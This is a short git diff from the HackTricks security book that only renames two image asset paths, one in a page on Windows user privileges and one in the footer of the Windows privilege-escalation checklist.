@@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
 
 Note the spotless' user membership:
 
-![](../../.gitbook/assets/1%20%282%29.png)
+![](../../.gitbook/assets/1%20%282%29%20%281%29.png)
 
 However, we can still add new users:
 
diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md
index 3deea92c3..11bed2a6a 100644
--- a/windows/checklist-windows-privilege-escalation.md
+++ b/windows/checklist-windows-privilege-escalation.md
@@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%283%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)
 
 ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*